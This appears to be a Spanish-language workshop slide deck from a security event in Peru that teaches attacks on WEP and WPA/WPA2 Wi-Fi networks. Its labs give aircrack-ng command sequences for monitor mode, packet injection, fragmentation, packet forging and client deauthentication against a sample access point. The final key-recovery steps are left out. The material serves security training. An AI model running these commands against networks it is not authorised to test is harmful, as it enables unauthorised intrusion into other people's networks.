SECURITY DAY
PERU
Ataques a las Redes Inalámbricas
Vulnerando Redes Inalámbricas WEP y WPA
Email: [email protected]| Tel. +(507) 271 5951 |Tel. +(1) 928 752 1325|Aptdo. 55-0444, Paitilla. Panama City, Panama
SOLUTIONS FOR KEEPING YOUR BUSINESS UP
®
• Lab 1. Explotando Vulnerabilidad de WEP con clientes inalámbricos • Lab 2. Explotando Vulnerabilidad de WEP sin clientes inalámbricos • Lab 3. Explotando Vulnerabilidad de WPA
Security Day> Perú>
Aprovechando vulnerabilidades>
Ataque a WEP con clientes
• Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de 1995.
• La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida).
• El ataque con clientes (repetición) es viable en la mayoría de AP.
Aprovechando vulnerabilidades>
Lab del ataque WEP con clientes
• Desde nuestro Backtrack, iniciamos el reconocimiento:
– iwconfig (visualizamos las interfaces inalámbricas)
– rmmod rtl8187
– modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica)
– airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor)
– airodump-ng mon0 (capturamos los paquetes)
• Preparamos el ataque de inyección con clientes.
– rmmod rtl8187
– modprobe rtl8187
– airmon-ng start wlan0 10
– airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10
Aprovechando vulnerabilidades>
Lab del Ataque a WEP con clientes
• Ejecutamos la asociación al AP
– aireplay-ng -1 0 -e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0
• Realizamos la inyección de paquetes
– aireplay-ng -3 -e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0
• Recuperamos la contraseña del AP
Aprovechando vulnerabilidades>
Ataque a WEP sin clientes
• Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de 1995.
• La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida).
• El ataque sin clientes (fragmentación) es viable en algunos tipos de AP,
cuando no, se debe probar korek chop chop.
Aprovechando vulnerabilidades>
Lab del Ataque a WEP sin clientes
• Desde nuestro Backtrack, iniciamos el reconocimiento:
– iwconfig (visualizamos las interfaces inalámbricas)
– rmmod rtl8187
– modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica)
– airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor)
– airodump-ng mon0 (capturamos los paquetes) • Preparamos el ataque de fragmentación.
– rmmod rtl8187
– modprobe rtl8187
– airmon-ng start wlan0 10
– airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10
Aprovechando vulnerabilidades>
Lab del Ataque a WEP sin clientes
• Ejecutamos el ataque de fragmentación
– aireplay-ng -1 0 -e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0
– aireplay-ng -5 -b 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0
• Generamos el paquete a inyectar
– packetforge-ng -0 -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b -k 255.255.255.255 -l 255.255.255.255 -y
fragment-1023-001529.xor -w paquete
• Realizamos la inyección de paquetes
– aireplay-ng -2 -r paquete mon0
Aprovechando vulnerabilidades>
Ataque a WPA/WPA2
• Esta vulnerabilidad se basa en la captura del 4 way handshake, realizado en la asociación y
autenticación de un cliente y un AP.
• Afecta a todos los dispositivos que empleen autenticación con cifrado TKIP.
Aprovechando vulnerabilidades>
Lab del ataque WPA/WPA2
• Desde nuestro Backtrack, iniciamos el reconocimiento:
– iwconfig (visualizamos las interfaces inalámbricas)
– rmmod rtl8187
– modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica)
– airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor)
– airodump-ng mon0 (capturamos los paquetes)
• Preparamos el ataque de inyección con clientes.
– rmmod rtl8187
– modprobe rtl8187
– airmon-ng start wlan0 10
Aprovechando vulnerabilidades>
Lab del ataque a WPA/WPA2
• Ejecutamos la asociación al AP
– aireplay-ng -0 5 -a 00:19:5b:e0:22:2e -c 00:c0:ca:19:cd:4b mon0
• Recuperamos la contraseña del AP